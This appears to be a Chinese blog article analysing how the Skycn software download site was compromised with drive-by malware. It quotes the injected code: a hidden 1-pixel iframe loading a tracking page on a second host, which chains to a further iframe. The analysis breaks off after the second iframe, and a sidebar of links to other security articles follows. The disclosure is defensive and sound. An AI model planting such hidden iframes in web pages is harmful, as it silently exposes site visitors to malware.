|
[组图]天空软件站被挂马
天空软件站是中国最大的软件下载站之一,如今它被挂马了,那么想必已经有几千万人中招了。Monyer并不是危言耸听,下面的分析将证明这不是个笑话。
今天偶尔上天空看我的UDisk时(重要提醒,天空有病毒不要打开,晕了!),发现Maxthon居然弹出程序运行警告,提示我在c盘下有个c.exe文件要运行,不知道其他人遇到这种情况怎么想,反正从我电脑上出现便成了一件恐怖的事情。看了看任务管理器,内存已经增加了几百兆,很显然被溢出了。再看看C盘的根目录,一个c.exe文件正躺在那里。于是便开始了以下寻马之旅。
通过对天空站的分析,被挂马的页面仅存在于软件下载页面。再通过对加进的javascript和iframe的排除,最后落定被插入的恶意代码为:
| 以下是引用片段: <iframe name=import_frame width=1 height=1 src=http://iplog.skycn.com/wherefrom.php?id=32336 frameborder=no></iframe> |
它将框架的宽高设为1像素即肉眼不可见。下载whereform.php文件发现里面有另外的代码:
| 以下是引用片段: <iframe src=http://www.ip17173.cn/index.html?419891509 width=100 height=0></iframe> |
又一个框架,直接访问将看到两个计数器,挺有意思
| 08年网络账号防盗最强手册 | 08-18 |
| 360卫士发布“装机必备软件”下载 | 02-13 |
| 认清本质 计算机病毒防治常遇问题 | 01-24 |
| 防止木马有效率90%以上的最有效办 | 01-21 |
| 彻底杜绝U盘病毒 多重防护力保平 | 01-18 |
| 彻底杜绝U盘病毒 多重防护力保平 | 01-16 |
| 利用微点软件 防御机器狗病毒(ED | 01-15 |
| 如何摆脱黑客攻击方法 | 01-06 |
| 不再重装 手动清除顽固病毒AutoR | 01-06 |
| 主动出击 让系统远离危害(图) | 01-06 |
| 如何清除能突破主动防御的新型木 | 01-06 |
| [攻防手记]手工清理病毒原来可以 | 01-06 |
您现在的位置: